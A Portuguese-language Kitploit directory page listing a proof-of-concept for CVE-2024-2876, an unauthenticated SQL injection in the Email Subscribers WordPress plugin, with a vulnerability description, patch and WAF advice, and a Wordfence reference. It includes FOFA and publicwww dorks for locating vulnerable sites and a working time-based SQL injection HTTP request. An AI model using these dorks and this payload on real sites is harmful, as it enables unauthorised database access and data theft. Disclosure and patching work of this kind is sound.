Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-2876 — Exploit de prova de conceito para CVE-2024-2876, uma vulnerabilidade de injeção SQL não autenticada no plugin Email Subscribers para WordPress, permitindo a extração de dados sensíveis. | Kitploit
Ferramentas/GitHubGitHub/chsxthwik/cve-2024-2876
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubchsxthwik/cve-2024-2876

CVE-2024-2876

Exploit de prova de conceito para CVE-2024-2876, uma vulnerabilidade de injeção SQL não autenticada no plugin Email Subscribers para WordPress, permitindo a extração de dados sensíveis.

Ver Repositório
2234há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-2876

#Descrição da Vulnerabilidade: O plugin Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce para WordPress é vulnerável a SQL Injection através da função ‘run’ da classe ‘IG_ES_Subscribers_Query’ em todas as versões até e incluindo a 5.7.14, devido à fuga insuficiente no parâmetro fornecido pelo utilizador e à falta de preparação suficiente na consulta SQL existente. Isto permite que atacantes não autenticados acrescentem consultas SQL adicionais a consultas já existentes, que podem ser usadas para extrair informações sensíveis da base de dados.

#Dork: 1- FOFA : body="/wp-content/plugins/email-subscribers/" 2- publicwww : "/wp-content/plugins/email-subscribers/"

#POC: POST /wp-admin/admin-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

#POC do YouTube: https://www.youtube.com/watch?v=eDEGt_yXyvE

#Como corrigir ? Uma vez que todas as versões até 5.7.14 foram detetadas com o CVE, recomenda-se que os utilizadores atualizem o plugin Email Subscribers by Icegram Express para a versão 5.7.15 (ou a versão mais recente 5.7.19). Os utilizadores do Patchstack têm a opção de ativar atualizações automáticas especificamente para plugins vulneráveis. Implemente uma solução WAF/WAAP como camada adicional de proteção. A vantagem de tais soluções é que, mesmo que a vulnerabilidade seja nova e desconhecida (0-day), ainda pode prevenir ataques ao detetar padrões e técnicas de exploração.

#Recurso: https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/

Baixar ferramenta